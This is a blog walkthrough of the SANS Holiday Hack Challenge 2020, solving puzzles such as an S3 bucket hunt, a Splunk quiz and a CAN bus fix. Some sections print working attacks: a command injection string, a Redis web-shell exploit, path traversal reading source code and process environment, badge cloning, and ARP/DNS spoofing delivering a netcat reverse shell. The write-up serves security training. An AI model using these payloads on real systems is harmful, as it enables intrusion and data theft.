SANS Holiday Hack Challenge 2020 | FLRNKS

Uncover Santa's Gift List

Tue, 22 Dec 2020 00:00:00 +0100

After a long and snowy journey I’ve finally arrived to the north pole to attend KringleCon III! I talk to Jingle Ringford to orientate myself:

Welcome! Hop in the gondola to take a ride up the mountain to Exit 19: Santa’s castle! Santa asked me to design the new badge, and he wanted it to look really cold - like it was frosty. Click your badge (the snowflake in the center of your avatar) to read your objectives. If you’d like to chat with the community, join us on Discord! We have specially appointed Kringle Koncierges as helpers; you can hit them up for help in the #general channel! If you get a minute, check out Ed Skoudis’ official intro to the con! You can’t wait to get to the KingleCon but first, your should check your badge which already has your first objective ready:

I see the big billboard on the top-left near the main road. Click HERE to open it in a new window so that you can download it for closer inspection.

Some hints from the badge to get started with the image manipulation:

There are tools out there that could help Filter the Distortion that is this Twirl.
Make sure you Lasso the correct twirly area.

It seems that to recover Santa’s gift to Josh Wright I will need to do a bit of image manipulation to un-twirl the photo’s section which contains the list.

Luckily they shared a link to this online tool which can do this quite easily.

After fiddling around with it for a few minutes, I managed to un-twirl it enough to read it: proxmark

Click to learn more about what proxmark is, it may be useful later on …

On to the next objective! 😎

Investigate S3 Bucket

Tue, 22 Dec 2020 00:00:00 +0100

After recovering Santa’s gift list, I take the snow lift and arrive to the Kringle Castle’s Front Lawn. Here, I find a few characters here, including Santa himself, who greets me right away:

Hello and welcome to the North Pole! We’re super excited about this year’s KringleCon 3: French Hens. My elves have been working all year to upgrade the castle. It was a HUGE construction project, and we’ve nearly completed it. Please pardon the remaining construction dust around the castle and enjoy yourselves!

The 2nd objective in the badge instructs me to investigate some S3 bucket used at the North Pole. For hints, I talk with Shinny Upatree in the bottom right corner. But before, he asks for a favor with the Kringle Kiosk terminal:

Hiya hiya - I’m Shinny Upatree! Check out this cool KringleCon kiosk! You can get a map of the castle, learn about where the elves are, and get your own badge printed right on-screen! Be careful with that last one though. I heard someone say it’s “ingestible.” Or something… Do you think you could check and see if there is an issue?

The Kringle Kiosk challenge involves escaping from the application via a Command Injection:

1Welcome to our castle, we're so glad to have you with us!
2Come and browse the kiosk; though our app's a bit suspicious.
3Poke around, try running bash, please try to come discover,
4Need our devs who made our app pull/patch to help recover?
5
6Escape the menu by launching /bin/bash << THE TASK!

Once I open the Kiosk and hit enter, I see a list of menu items to choose from:

 1~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 2 Welcome to the North Pole!
 3~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 41. Map
 52. Code of Conduct and Terms of Use
 63. Directory
 74. Print Name Badge
 85. Exit
 9
10Please select an item from the menu by entering a single number.
11Anything else might have ... unintended consequences.
12Enter choice [1 - 5]

Keeping in mind Shinny’s advice about option 4 that’s used to print badges, I chose that option. This may be the one that has the Command Injection flaw. When it’s selected it even has a warning about special characters. Let’s see how it handles my username + some special characters: FLRNKS; /bin/bash

Now that wasn’t too hard! I then talk to Shinny to get those hints he promised:

Golly - wow! You sure found the flaw for us! Say, we’ve been having an issue with an Amazon S3 bucket. Do you think you could help find Santa’s package file? Jeepers, it seems there’s always a leaky bucket in the news. You’d think we could find our own files! Digininja has a great guide, if you’re new to S3 searching. He even released a tool for the task - what a guy! The package wrapper Santa used is reversible, but it may take you some trying. Good luck, and thanks for pitching in!

Some hints also from the badge:

It seems there’s a new story every week about data exposed in unprotected AWS S3 buckets
Find Santa’s package file in S3, see Josh Wright’s talk for tips
Robin Wood wrote up a guide about finding these open S3 buckets
He even wrote a tool to search for unprotected buckets
Santa’s Wrapper3000 is pretty buggy. It uses several compression tools, binary to ASCII conversion, and other tools to wrap packages.

To get started I click on the terminal to the right side of Shinny, that brings up a new terminal CLI:

On the terminal’s file system there is a folder called bucket_finder that contains a Ruby Script and a wordlist. The script can take this wordlist and iterate over each line and test if a S3 bucket with such a name exists and whether it’s public. With the --download flag, it can also download all available objects if a public bucket is found.

The wordlist initially contains only 3 words and none of them map to the bucket I need. Part of the challenge was to come up with new entries in the wordlist in order to find the bucket. While thinking of possibilities, I remembered the Terminal MOTD which had a brightly emphasized word Wrapper3000, so I added two variants of it to the list. First I added it as it was, then with lowercase W, remembering that S3 bucket names are case-sensitive. Lo and behold, the lower-case version was the name of the bucket which had the package file I needed:

1elf@6baea2e4fddd:~/bucket_finder$ cat wordlist
2...
3Wrapper3000
4wrapper3000
5elf@6baea2e4fddd:~/bucket_finder$ ./bucket_finder.rb wordlist
6...
7Bucket does not exist: Wrapper3000
8Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )
9 <Public> http://s3.amazonaws.com/wrapper3000/package << THE FILE WE NEED!

Running the Ruby script again with --download flag cloned the bucket to a subdirectory called wrapper3000. Next I navigated to this directory and started inspecting the contents of package:

1elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package
2package: ASCII text, with very long lines
3elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package
4UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAAEAAQBiAAAA9QEAAAAA

Right away it looked like it was base64 encoded text, so I ran it through base64 -d . Then I checked what kind of file was recovered, and it was in fact a compressed ZIP file:

1elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package | base64 -d > package-decoded
2elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package-decoded
3package-decoded: Zip archive data, at least v1.0 to extract

Next I used unzip to recover the file that was hiding in this ZIP. The resulting file had a rather long list of extensions which suggested there was more unwrapping to do:

1elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unzip package-decoded
2Archive: package-decoded extracting: package.txt.Z.xz.xxd.tar.bz2
3elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package.txt.Z.xz.xxd.tar.bz2
4package.txt.Z.xz.xxd.tar.bz2: bzip2 compressed data, block size = 900k

Next, I started peeling back each layer of encoding/compression in reverse order to finally reveal the solution of this Objective:

1elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ bunzip2 package.txt.Z.xz.xxd.tar.bz2
2elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ tar xopf package.txt.Z.xz.xxd.tar
3elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd > package.txt.Z.xz
4elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unxz package.txt.Z.xz
5elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ uncompress package.txt.Z
6elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package.txt
7North Pole: The Frostiest Place on Earth

Brrrrrr … 🥶 On to the next objective!

Point-of-Sale Password Recovery

Tue, 22 Dec 2020 00:00:00 +0100

After solving the S3 bucket challenge, this new objective leads me to the courtyard where I meet up with Sugarplum Mary to help her recover a lost password for the PoS terminal:

Sugarplum Mary? That’s me! I was just playing with this here terminal and learning some Linux! It’s a great intro to the Bash terminal. If you get stuck at any point, type hintme to get a nudge! Can you make it to the end?

This terminal was like a quick refresher/lesson to hone your Linux Terminal skillz. I used the below list of commands to solve it:

 1ls
 2cat munchkin_19315479765589239
 3rm munchkin_19315479765589239
 4pwd
 5ls -la | grep munchkin
 6cat .bash_history | grep munchkin
 7env | grep munchkin
 8cd workshop
 9find . -type f -name "toolbox*.txt" | xargs grep -i munchkin
10chmod +x lollipop_engine
11./lollipop_engine
12cd electrical/
13mv blown_fuse0 fuse0
14ln -s fuse0 fuse1
15cp fuse1 fuse2
16echo "MUNCHKIN_REPELLENT" >> fuse2
17cd /opt/munchkin_den/
18find .
19find . -user munchkin
20find . -size +108k -size -110k
21ps a
22netstat -l
23curl http://0.0.0.0:54321
24kill -s 9 11555

The interactive nature of the whole terminal reminded me of the Mini NetWars challenges from earlier this year, which was a nice feeling! Talking to Mary again revealed the below hints about them main objective:

You did it - great! Maybe you can help me configure my postfix mail server on Gentoo! Just kidding! Hey, wouldja’ mind helping me get into my point-of-sale terminal? Just kidding! It’s down, and we kinda’ need it running.. Problem is: it is asking for a password. I never set one! Can you help me figure out what it is so I can get set up? Shinny says this might be an Electron application. I hear there’s a way to extract an ASAR file from the binary, but I haven’t looked into it yet.

… and the hints from the badge:

It’s possible to extract the source code from an Electron app.
There are tools and guides explaining how to extract ASAR from Electron apps.
the PoS firmware is available to download HERE as a 47MB .exe file

To get started I spun up a Windows VM on my MacBook and downloaded the exe within this machine. I also installed 7zip to help with unpacking the EXE file with the goal of recovering the asar file which contains the source code for the app. After opening the exe in 7zip, I found the app.asar in the resources subdirectory, which I extracted to my working folder:

Next, I used the Windows Command Prompt, installed NPM and the asar packaging tool to help unpack the recovered app.asar file:

This operation recovered several files, reading the README pointed me directly to main.js which had the password right at the top of the file:

On to the next one! 😎

Operate the Santavator

Thu, 24 Dec 2020 00:00:00 +0100

This objective leads me back to the Kringle Castle’s Front Lawn to talk with Pepper Minstix for hints to the operation of the Santavator, as long as I help with his terminal before:

Howdy - Pepper Minstix here! I’ve been playing with tmux lately, and golly it’s useful. Problem is: I somehow became detached from my session. Do you think you could get me back to where I was, admiring a beautiful bird? If you find it handy, there’s a tmux cheat sheet you can use as a reference. I hope you can help!

I think this was the simplest one so far. Reading up on TMUX I found a way to list all sessions by issuing tmux ls, which revealed that there was one session created recently:

1elf@6da9144bb25b:~$ tmux ls
20: 1 windows (created Sun Dec 27 10:28:11 2020) [80x24]

Next I tried tmux attach which revealed the colorful birdie:

Talking again with Pepper Minstix rewarded me with the below hints for the main objective:

You found her! Thanks so much for getting her back! Hey, maybe I can help YOU out! There’s a Santavator that moves visitors from floor to floor, but it’s a bit wonky. You’ll need a key and other odd objects. Try talking to Sparkle Redberry about the key. For the odd objects, maybe just wander around the castle and see what you find on the floor. Once you have a few, try using them to split, redirect, and color the Super Santavator Sparkle Stream (S4).

Next, I enter the Kringle Castle through the main entrance to talk with Sparkle Redberry about the Santavator:

Hey hey, Sparkle Redberry here! The Santavator is on the fritz. Something with the wiring is grinchy, but maybe you can rig something up? Here’s the key! Good luck! On another note, I heard Santa say that he was thinking of canceling KringleCon this year! At first, I thought it was a joke, but he seemed serious. I’m glad he changed his mind. Have you had a chance to look at the Santavator yet? With that key, you can look under the panel and see the Super Santavator Sparkle Stream (S4). To get to different floors, you’ll need to power the various colored receivers. … There MAY be a way to bypass the S4 stream.

There’s also one hint in the badge for the main objective:

It’s really more art than science. The goal is to put the right colored light into the receivers on the left and top of the panel.

Next I look around the castle to find the needed objects that will help me fix the wonky Santavator. Specifically I need to recover some colorful light bulbs, and a Hex Nut that will help steer and paint the electrons to correct color:

One of the light bulbs cannot be found until reaching the Speaker Unprep Room on the 2nd Floor. It’s not possible to get to this floor until I tweak the Santavator to take me there. Luckily the green bulb and the Hex Nut are easy to find and are enough to complete this objective. Once the green electrons are flying into the green tunnel in sufficient number I could close the lid and press the button to the 2nd floor:

Which also completes this objective.

On to the next one! 😎

Open HID Lock

Thu, 24 Dec 2020 00:00:00 +0100

Once I figured out how to operate the Santavator, I went up to the 2nd floor where I find several rooms hosting the virtual KringleCon Talks as well as Bushy Evergreen. He’s supposed to give hints for solving the main objective, but first he desperately needs my help getting into the Speaker Unpreparedness Room:

Ohai! Bushy Evergreen, just trying to get this door open. It’s running some Rust code written by Alabaster Snowball. I’m pretty sure the password I need for ./door is right in the executable itself. Isn’t there a way to view the human-readable strings in a binary file?

Opening the door was quite easy with his tip on the use of the strings utility on the main binary executable:

After the door was finally open, Bushy asks if I would like to help some more by turning on the lights in the room. Somehow this is not as trivial as it sounds:

That’s it! What a great password… Hey, you want to help me figure out the light switch too? Those come in handy sometimes. The password we need is in the lights.conf file, but it seems to be encrypted. There’s another instance of the program and configuration in ~/lab/ you can play around with. What if we set the user name to an encrypted value?

Paying closer attention to the last sentence, the solution was quite straight-forward:

Finally, he asks for help with the vending machine so speakers can get their snacks and beverages:

Wow - that worked? I mean, it worked! Hooray for opportunistic decryption, I guess! So hey, if you want, there’s one more challenge. You see, there’s a vending machine in there that the speakers like to use sometimes. Play around with ./vending_machines in the lab folder. You know what might be worth trying? Delete or rename the config file and run it. Then you could set the password yourself to AAAAAAAA or BBBBBBBB. If the encryption is simple code book or rotation ciphers, you’ll be able to roll back the original password.

Solving this one required some more craftiness, but brute-forcing the PW was not that difficult:

Your lookup table worked - great job! That’s one way to defeat a polyalphabetic cipher! Good luck navigating the rest of the castle.

At long last, below are the various hints from Bushy for solving these challenges:

Santa asked me to ask you to evaluate the security of our new HID lock. If ever you find yourself in posession of a Proxmark3, click it in your badge to interact with it. It’s a slick device that can read others’ badges! Oh, did I mention that the Proxmark can simulate badges? Cool, huh? There are lots of references online to help. In fact, there’s a talk going on right now! So hey, if you want, there’s one more challenge. And that Proxmark thing? Some people scan other people’s badges and try those codes at locked doors. Other people scan one or two and just try to vary room numbers. Do whatever works best for you!

Now it was time to enter the room next to Bushy and see what was hiding in there. With the lights turned on it was easy to some item lying on the ground, I’m sure it would be useful for tweaking the Santavator later on. Also, clicking the vending-machine a few times rewards you with some new items.

Before turning to the main objective, I went to the Kitchen to help Fitzy Shortstack with the Dial-Up Terminal that controls the internet connected X-mas lights:

“Put it in the cloud,” they said… “It’ll be great,” they said… All the lights on the Christmas trees throughout the castle are controlled through a remote server. We can shuffle the colors of the lights by connecting via dial-up, but our only modem is broken! Fortunately, I speak dial-up. However, I can’t quite remember the handshake sequence. Maybe you can help me out? The phone number is 756-8347; you can use this blue phone.

I proceed to listen to THIS tone to be able to figure out the sequence.

Eventually I should find the correct sequence:

ba DEE brrr
aahh
WEWEWwrwrwrr
beDURRdunditty
SCHHRRHHRTHRTR

Which earns me this new hint:

You know, Santa really seems to trust Shinny Upatree…

Which doesn’t make too much sense at first, but earlier I learnt from Bushy that a ProxMark3 device will be essential for opening the HID lock. It can be used to clone and replay RFID badges that can open the door in the Workshop. Maybe Shinny is the one whose badge I should try to steal wih the ProxMark3?

Let’s find out!

Next I head back to the Santavator and use the new items I found in the Speaker Unpreparedness Room to unlock the journey up to the Workshop!

Upon entering, I check the small Wrapping Room where I find the ProxMark3 I needed so much! I try to study it a bit by reading the short list of commands given in the badge:

Larry Pesce knows a thing or two about HID attacks. He’s the author of a course on wireless hacking!
Short list of essential proxmark commands HERE

After watching that KringleCon talk on HID Card Hacking and reading the cheat-sheet, I head back to the Castle’s Front Lawn to try to steal Shinny's RFID card details with the command lf hid read:

That looks great! Now I go back to the Workshop, I stand next to the HID protected door to replay Shinny's card parameters with the ProxMark3:

Well that worked flawlessly! Let’s see what’s in this room.

Hmmm… it seems to be just dark and empty but with a really NICE song! I stop for a moment to appreciate it.

Then I check if there is anything down there. Ohhhhhhhh wait… I’ve become Santa himself?! 😱

On to the next objective 🎅🏻!

Splunk Challenge

Thu, 24 Dec 2020 00:00:00 +0100

After solving the HID Lock challenge, I continue solving the objectives as Santa with some special privileges. I can access various systems that was only possible for Santa before, like the Splunk terminal in the Great Room which used to be locked with the following error message The Splunk terminal is for Santa and select SOC elves only…

Unfortunately there are no more hints from the elves, only warnings and panic:

Hey Santa, there’s some crazy stuff going on that we can see through our Splunk infrastructure. You better login and see what’s up.

Next I click the terminal on the table which opens Splunk in a new tab with the goal of figuring out the answer to the next objective:

Thankfully it has a very nice chat interface where Alice Bluebird helps out with hints for the first few training questions:s

Question 1

How many distinct MITRE ATT&CK techniques did Alice emulate?

Alice provides the first part of a handy splunk query to find that the answer is 13:

| tstats count where index=* by index
| search index=T*-win OR T*-main
| rex field=index "(?<technique>t\d+)[\.\-].0*"
| stats dc(technique)

Question 2

What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

This was also rather easy to answer: t1059.003-main t1059.003-win

Question 3

One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?

A simple search in Splunk for index=* MachineGuid reveals entries such as REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid which quickly provides the answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

Question 4

According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp)

Following a similar logic, I searched for index=* OSTAP in splunk, which retrieved 8 results. Then I scrolled down to the bottom to find the oldest one and submitted its timestamp as answer: 2020-11-30T17:44:15Z

Question 5

One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

For this one I had to try a bit harder, but some time spent looking at the frgnca github repo, I figured that it had to do something with Audio, so I crafter this query in Splunk index=* EventCode=1 AND CommandLine="*Audio*" which helped retrieve the correct answer: 3648

Question 6

Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

This question probably took me the longest to figure out. I’ve spent about 2 hours looking for information in Splunk, and what eventually unblocked me was reading the question over and over again until I realized that the answer will come only partially from Splunk. Eventually I solved it by searching for any occurrence of *.bat files in Splunk, which helped me find Discovery.bat from the Red Canary repo, which was used to create the simulation. The answer was the final line in this batch script: quser

Question 7

According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

This was a rather easy one, I searched for index=* SERIAL in Splunk which revealed several records. Right on top the first one had the answer: 55FCEEBB21270D9249E86F4B9DC7AA60

Final Question

What is the name of the adversary group that Santa feared would attack KringleCon?

For this final question Alice provided a base64 encoded cipher text that according to her was encrypted with Santa’s favourite phrase.

7FXjP1lyfKbyDK/MChyf36h7

What’s more, she even suggested that the encryption key was mentioned during the KringleCon Talk by Dave Herrald on Adversary Emulation and Automation. I fast-forwarded to the end to find this slide:

The choice of RC4 cipher was almost obvious, after reading Alice’s hint in Splunk SOC Chat:

It’s encrypted with an old algorithm that uses a key. We don’t care about RFC 7465 up here! I leave it to the elves to determine which one!

Armed with this knowledge, I used CyberChef and the uncovered passphrase to uncover the name of the adversary group.

On to the next one! 😎

Sleigh CAN-D-BUS Issue

Thu, 24 Dec 2020 00:00:00 +0100

Now that Spunk is solved, my badge tells me to head up to the NetWars room for solving the next objective and talk with Wunorse Openslae who can help if you figure out what’s up with his terminal:

Hey Santa! Those tweaks you made to the sled just don’t seem right to me. I can’t figure out what’s wrong, but maybe you can check it out to fix it.

Next I click on the terminal next to him, which pops up a CLI session. As the MOTD tells me, there is a file with logs of the CAN traffic of the sleigh. In the logs there are few distinct message types:

Engine UP/DOWN messages (many of these)
LOCK and UNLOCK messages (3 in total!)

So then I inspect the candump.log file and do some transformations on it. First, I filter each line and keep only the third column. Then I extract the first 3 characters of each line and use sort -nr & uniq -c to show how many of each line is present in the logs:

1elf@87cee25c674e:~$ cat candump.log | awk '{print $3}' | cut -b 1-3 | sort -nr | uniq -c
2 1331 244
3 35 188
4 3 19B
5
6elf@87cee25c674e:~$ cat candump.log | grep 19B#
7(1608926664.626448) vcan0 19B#000000000000
8(1608926671.122520) vcan0 19B#00000F000000
9(1608926674.092148) vcan0 19B#000000000000

This helps to know that messages with ID 19B are related to LOCK/UNLOCK events. This will be useful to know for fixing Santa’s sleigh next:

Next I click on Santa’s sleigh, and a strange UI interface pops up. To learn more about what it is, I watch the KringleCon talk from Chris Elgee on CAN Bus in vehicles HERE.

Initially, I just naively excluded all messages with ID 19B but that did not seem to fix it. Then I excluded some of the most common messages to make the steam slower a bit so that I can see more clearly what was happening. That’s when I discovered a strange message with the same ID but non-zero payload in the stream:

11609081466157 019#00000000
21609081466258 188#00000000
31609081466462 19B#0000000F2057 << THIS SHOULD NOT BE HERE!
41609081466562 080#000000
51609081466663 019#00000000
61609081466767 188#00000000

I thought this may be the malicious message that is being inserted onto the bus, so I excluded it. This was probably a step in the right direction, but it was still not enough to complete the objective.

Next, I proceeded to play a bit with the controls and noticed something strange when the slider for the break was moved. I noticed that on each cycle, two messages would be emitted from the break:

11609082448556 080#000028
21609082448576 080#FFFFF0 <<< EXCLUDE!
31609082449074 080#000028
41609082449077 080#FFFFF3 <<< EXCLUDE!

The ones with high payload value seemed suspicious, so I excluded them all and voila, this was the correct solution!

On to the next one! 😎

Broken Tag Generator

Thu, 24 Dec 2020 00:00:00 +0100

Now that Santa’s sleigh’s CAN-D-BUS issue is fixed it’s time to move on to Objective 8 for fixing the KringleCon Tag Generator in the Wrapping Room. First, I head to the Kitchen to talk with Holly Evergreen who is ready to trade some hints for my help with the Redis terminal:

Hi Santa! If you have a chance, I’d love to get your feedback on the Tag Generator updates! I’m a little concerned about the file upload feature, but Noel thinks it will be fine.

Clicking the Redis Terminal next to him will bring up a shell window. After some inspection the task at hand is more or less clear: I need to exfiltrate the index.php file from the server on localhost using maintenance.php. This endpoint accepts a cmd parameter which executes the given parameters in redis-cli.

For start, I query the entire redis config with the below command (which is then filtered for just the PW):

1player@100dfcdfbca2:~$ curl http://localhost/maintenance.php?cmd=CONFIG,GET,* 2>/dev/null | grep pass -A 3
2Running: redis-cli --raw -a '<password censored>' 'CONFIG' 'GET' '*'
3dbfilename
4dump.rdb
5requirepass
6R3disp@ss <<< Will be very handy to start a local redis-cli session with privileges!
7masterauth

Next, I was looking around the internet for Redis vulnerabilities including local file access and found THIS link which has a section on Redis RCE vulnerability. While that example did not work straight out of the box, it pointed me to the right direction which eventually led me to the below exploit (inspired by this source) submitted via the redis-cli using the previously obtained password:

1echo "CONFIG SET dir /var/www/html" | redis-cli -a R3disp@ss
2echo "CONFIG SET dbfilename exfil.php" | redis-cli -a R3disp@ss
3echo "SET PAYLOAD \"<?php system(\$_GET['cmd']); ?>\"" | redis-cli -a R3disp@ss
4echo "BGSAVE" | redis-cli -a R3disp@ss

Finally, to exfiltrate the index.php I execute a cURL simple command:

Now that the redis bug is discovered, I can get the promised hints from Holly:

Sorry to be a pest Santa, but could you look at the Tag Generator? I’ve been looking at it, and I wonder if the source code would provide more insight? I told Noel we should be more careful about disclosing information in error messages. I tried what you suggested and enumerating all endpoints really is good idea to understand an application’s functionality. Sometimes though, I find the Content-Type header hinders the browser more than it helps. Blind command injection can be frustrating though. Do you think output redirection would help?

Few more hints also appeared in the badge afterwards:

We might be able to find the problem if we can get source code!
Can you figure out the path to the script? It’s probably on error pages!
Once you know the path to the file, we need a way to download it!
Is there an endpoint that will print arbitrary files?
If you’re having trouble seeing the code, watch out for the Content-Type! Your browser might be trying to help (badly)!
I’m sure there’s a vulnerability in the source somewhere… surely Jack wouldn’t leave their mark?
If you find a way to execute code blindly, I bet you can redirect to a file then download that file!
Remember, the processing happens in the background so you might need to wait a bit after exploiting but before grabbing the output!

Now it’s time to head to the Wrapping Room to talk with Noel:

Welcome to the Wrapping Room, Santa! The tag generator is acting up. I feel like the issue has something to do with weird files being uploaded. Can you help me figure out what’s wrong?

The application in question is available via this LINK:

It seems to be a simple web-application that is used to build name-tags by uploading some graphics and adding your own text to it and then downloading the result. I proceed to inspect its source closer, to see what it takes to break it… 😇

Since both elves mentioned the file-upload part which may be problematic, I started playing with that to see how it worked:

when trying to upload a 5.2 MB pdf file it came back with 413 Request Entity Too Large, no client-side verification.
when uploading a smaller text file it came back with Something went wrong! and a more useful error message:

This helps me to identify that the source code handling the incoming requests are located at /app/lib/app.rb, which is going to be very useful later on. The hints earlier mention that it should be possible to download this file somehow through one of the API endpoints, I figured this should be the result of some sort of Local File Inclusion (LFI) vulnerability. To look for this endpoint, I look at the image upload functionality more closely by uploading a valid png image while simultaneously observing the network requests in the Networking Tab of the Developer console:

I notice that the first request was to the /upload endpoint. Once complete, the image was saved on the server, assigned a UUID and finally returned as a response. Next, there is a new request to same image UUID that was just returned via this other API endpoint: /image?id=<Random-UUID>.png which fetches the image from the server to display it. I take note of this and then decide to read more about LFI vulnerabilities in Web Applications. This article is especially useful from OWASP about Testing Directory Traversal File Include. Using this new information, I fire up a terminal on my laptop and use cURL to craft some test requests to this /image endpoint to see what kind of response comes back. On the very first try it looks quite promising:

1▶ curl https://tag-generator.kringlecastle.com/image?id=
2<h1>Something went wrong!</h1>
3<p>Error in /app/lib/app.rb: Is a directory @ io_fread - /tmp/</p>

The ERROR message after sending an empty id parameter reveals quite a lot actually! It shows that the Local File Inclusion / Directory Traversal exploit is be possible through this endpoint. Also, it shows that uploads are stored in /tmp/ directory.

Note that it is essential to use cURL instead of the browser because the API response always has this Content-Type: image/jpeg header set, which confuses browsers to interpret the payload as an image.

Finally, I use the intel I gathered to successfully retrieve the Ruby source code of the Web Application:

1▶ curl https://tag-generator.kringlecastle.com/image?id=../app/lib/app.rb
2# encoding: ASCII-8BIT
3
4TMP_FOLDER = '/tmp'
5FINAL_FOLDER = '/tmp'
6
7# Don't put the uploads in the application folder
8Dir.chdir TMP_FOLDER
9...

After fetching the file I examine it closer to see if I can find more clues for retrieving the contents of the GREETZ env variable. In fact, there are some commented lines from Jack in the handle_zip function that look promising:

# I wonder what this will do? --Jack
# if entry.name !~ /^[a-zA-Z0-9._-]+$/
# raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen'
# end

Eventually, I give up trying to figure out how this would work to my advantage. Nevertheless, I am still able to exfil the ENV variable via the same LFI vulnerability that allowed me to extract the Ruby source code.

I achieve this by remembering that everything is a file in Linux. I first try to extract /etc/environment which is just plain empty. Then I recall that every process has its own /proc/PID/environ file for storing ENV vars, so I try to guess the PID of the Web App and to my big surprise I get it right on the first try:

 1▶ curl https://tag-generator.kringlecastle.com/image?id=../proc/1/environ --output -
 2PATH=/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 3HOSTNAME=cbf2810b7573
 4RUBY_MAJOR=2.7
 5RUBY_VERSION=2.7.0
 6RUBY_DOWNLOAD_SHA256=27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343
 7GEM_HOME=/usr/local/bundle
 8BUNDLE_SILENCE_ROOT_WARNING=1
 9BUNDLE_APP_CONFIG=/usr/local/bundleA
10PP_HOME=/app
11PORT=4141HOST=0.0.0.0
12GREETZ=JackFrostWasHere
13HOME=/home/app

There it is, the solution to Objective 8: JackFrostWasHere!

Quite unintentionally, I also find the same value saved to a TXT file in /tmp/greetz.txt. At first, I think that it was left there by a fellow HHC contestant, but later on the CHC folks confirmed that it was indeed Jack himself!

Anyhow, on to the next one! 😎

ARP Shenanigans

Sun, 27 Dec 2020 00:00:00 +0100

After solving the Tag Generator objective, I head back to the NetWars room to help Alabaster Snowball with his Scapy Terminal, in exchange for hints:

Hey Santa! You’ve got to check out our Scapy Present Packet Prepper! Please work through the whole thing to make sure it’s helpful for our guests! I made it so that players can help() to see how to get tasks and hints. When you’re done, maybe you can help me with this other issue I’m having.

The exact commands I enter can be found HERE. They are just wonderful for refreshing my Python/Scapy skillz ahead of the main objective. Next, I get some real good hints from Alabaster:

Oh, I see the Scapy Present Packet Prepper has already been completed! Now you can help me get access to this machine. It seems that some interloper here at the North Pole has taken control of the host. We need to regain access to some important documents associated with Kringle Castle. Maybe we should try a machine-in-the-middle attack? That could give us access to manipulate DNS responses. But we’ll still need to cook up something to change the HTTP response. I’m sure glad you’re here Santa.

With the following hints appearing in the badge:

Jack Frost must have gotten malware on our host at 10.6.6.35 because we can no longer access it
Try sniffing the eth0 interface using tcpdump -nni eth0 to see if you can view any traffic from that host.
Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let’s return a DNS response resolving the request to our IP.
The host is performing an ARP request. Perhaps we could do a spoof to perform a machine-in-the-middle attack. I think we have some sample scapy traffic scripts that could help you in /home/guest/scripts.
The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a command in a customized .deb file

First I spend some time wrapping my head around the overall design of this challenge. I end up crafting the below diagram to help with this:

Arrows are explained below:

The victim (right) sends an ARP request every second to find the MAC of IP: 10.6.6.53 (supposedly a local DNS server)
As the attacker (left) I spoof the ARP response with my own MAC: 4c:24:57🆎ed:84
The victim starts sending DNS queries asking for the IP address of: ftp.osuosl.org
As the attacker I craft spoofed DNS responses to answer these queries with my own IP: 10.6.6.35
The victim tries to fetch resource /pub/jfrost/backdoor/suriv_amd64.deb via an HTTP request
As the attacker I have a custom HTTP server that returns a backdoored version of netcat
The victim installs this package which starts a reverse shell session via nc 10.6.6.35 4444 -e /bin/bash
As the attacker I start a local listener via nc -lvp 4444 to accept the reverse shell connection to exfil the document

